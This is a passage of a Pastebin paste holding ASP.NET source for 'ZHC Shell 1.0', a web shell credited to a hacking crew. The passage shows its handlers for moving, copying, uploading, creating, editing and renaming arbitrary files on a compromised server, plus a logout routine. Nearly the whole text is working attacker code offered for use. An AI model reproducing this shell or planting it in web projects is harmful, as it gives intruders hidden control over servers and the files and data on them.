  730. d=session("cutboard")
  731. if left(d,1)="" then
  732. TEMP1=url & path.getfilename(mid(replace(d,"",""),1,len(replace(d,"",""))-1))
  733. TEMP2=url & replace(path.getfilename(d),"","")
  734. if right(d,1)="\" then
  735. call xexistdir(TEMP1,ow)
  736. directory.move(replace(d,"",""),TEMP1 & "\")
  737. response.Write("<script>alert('Cut " & replace(replace(d,"",""),"\","\\") & " to " & replace(TEMP1 & "\","\","\\") & " success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(url) &"'</script>")
  738. else
  739. call xexistdir(TEMP2,ow)
  740. file.move(replace(d,"",""),TEMP2)
  741. response.Write("<script>alert('Cut " & replace(replace(d,"",""),"\","\\") & " to " & replace(TEMP2,"\","\\") & " success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(url) &"'</script>")
  742. end if
  743. else
  744. TEMP1=url & path.getfilename(mid(replace(d,"",""),1,len(replace(d,"",""))-1))
  745. TEMP2=url & path.getfilename(replace(d,"",""))
  746. if right(d,1)="\" then
  747. call xexistdir(TEMP1,ow)
  748. directory.createdirectory(TEMP1)
  749. call copydir(replace(d,"",""),TEMP1 & "\")
  750. response.Write("<script>alert('Copy " & replace(replace(d,"",""),"\","\\") & " to " & replace(TEMP1 & "\","\","\\") & " success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(url) &"'</script>")
  751. else
  752. call xexistdir(TEMP2,ow)
  753. file.copy(replace(d,"",""),TEMP2)
  754. response.Write("<script>alert('Copy " & replace(replace(d,"",""),"\","\\") & " to " & replace(TEMP2,"\","\\") & " success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(url) &"'</script>")
  755. end if
  756. end if
  757. case "upfile"
  758. url=request.QueryString("src")
  759. %>
  760. <form name="UpFileForm" enctype="multipart/form-data" method="post" action="?src=<%=server.UrlEncode(url)%>" runat="server" onSubmit="return checkname();">
  761. <center>Files will be uploaded to: <span class="style3"><%=url%></span><br>
  762. Upload:
  763. <input name="upfile" type="file" class="TextBox" id="UpFile" runat="server"><br><br>
  764. <input type="submit" id="UpFileSubit" value="Upload" runat="server" onserverclick="UpLoad" class="button"></center>
  765. </form>
  766. <%
  767. case "new"
  768. url=request.QueryString("src")
  769. %>
  770. <form runat="server">
  771. <center><%=url%><br>
  772. Name:
  773. <asp:TextBox ID="NewName" TextMode="SingleLine" runat="server" class="TextBox"/>
  774. <br>
  775. <asp:RadioButton ID="NewFile" Text="File" runat="server" GroupName="New" Checked="true"/>
  776. <asp:RadioButton ID="NewDirectory" Text="Directory" runat="server" GroupName="New"/>
  777. <br><br>
  778. <asp:Button ID="NewButton" Text="Submit" runat="server" CssClass="button" OnClick="NewFD"/>
  779. <input name="Src" type="hidden" value="<%=url%>"></center>
  780. </form>
  781. <%
  782. case "edit"
  783. dim b as string
  784. b=request.QueryString("src")
  785. call existdir(b)
  786. dim myread as new streamreader(b,encoding.default)
  787. filepath.text=b
  788. content.text=myread.readtoend
  789. %>
  790. <form runat="server">
  791. <table width="80%" border="1" align="center">
  792. <tr> <td width="11%">Path</td>
  793. <td width="89%">
  794. <asp:TextBox CssClass="TextBox" ID="filepath" runat="server" Width="300"/>
  795. *</td>
  796. </tr>
  797. <tr>
  798. <td>Content</td>
  799. <td> <asp:TextBox ID="content" Rows="25" Columns="100" TextMode="MultiLine" runat="server" CssClass="TextBox"/></td>
  800. </tr>
  801. <tr>
  802. <td></td>
  803. <td> <asp:Button ID="a" Text="Sumbit" runat="server" OnClick="Editor" CssClass="button"/>
  804. </td>
  805. </tr>
  806. </table>
  807. </form>
  808. <%
  809. myread.close
  810. case "rename"
  811. url=request.QueryString("src")
  812. if request.Form("name")="" then
  813. %>
  814. <form name="formRn" method="post" action="?action=rename&src=<%=server.UrlEncode(request.QueryString("src"))%>" onSubmit="return checkname();">
  815. <center><p>You wish to rename <span class="style3"><%=request.QueryString("src")%></span> to: <%=getparentdir(request.QueryString("src"))%>
  816. <input type="text" name="name" class="TextBox"><br><br>
  817. <input type="submit" name="Submit3" value="Submit" class="button">
  818. </p></center>
  819. </form>
  820. <script language="javascript">
  821. function checkname()
  822. {
  823. if(formRn.name.value==""){alert("You shall input filename :(");return false}
  824. }
  825. </script>
  826. <%
  827. else
  828. if Rename() then
  829. response.Write("<script>alert('Rename " & replace(url,"\","\\") & " to " & replace(Getparentdir(url) & request.Form("name"),"\","\\") & " Success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(Getparentdir(url)) &"'</script>")
  830. else
  831. response.Write("<script>alert('Exist the same name file , rename fail :(');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(Getparentdir(url)) &"'</script>")
  832. end if
  833. end if
  834. case "samename"
  835. url=request.QueryString("src")
  836. %>
  837. <form name="form1" method="post" action="?action=plaster&src=<%=server.UrlEncode(url)%>">
  838. <p class="style3">Exist the same name file , can you overwrite ?(If you click &quot; no&quot; , it will auto add a number as prefix)</p>
  839. <input name="OverWrite" type="submit" id="OverWrite" value="Yes" class="button">
  840. <input name="Cancel" type="submit" id="Cancel" value="No" class="button">
  841. </form>
  842. <p>
  843. <%
  844. case "logout"
  845. session.Abandon()
  846. response.Write("<center>Have a nice day...</center>")
  847. response.Write("<script>alert(' Goodbye !');location.href='rootshell.aspx" & request.ServerVariables("URL") & "';</sc" & "ript>")
  848. end select
  849. end if
  850. Catch error_x
  851. response.Write("<br/><center><font color=""red""></font></center>")
  852. End Try
  853. %>
  854. </p>
  855. <script language="javascript">
  856. function closewindow()
  857. {self.close();}
  858. </script>
  859. <b><p align="center" valign="bottom" class="footer">ZHC Shell 1.0&nbsp;&bull;&nbsp;2011<br/>
  860. By XXx_Death_xXX Of <a href="http://www.zone-hack.com" target="_blank" title="Welcome to ZHC SHEll"> ZCompany Hacking Crew</a>&nbsp;&bull;&nbsp;zone-hack.com #ZHC</p></b>
  861. </body>
  862. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!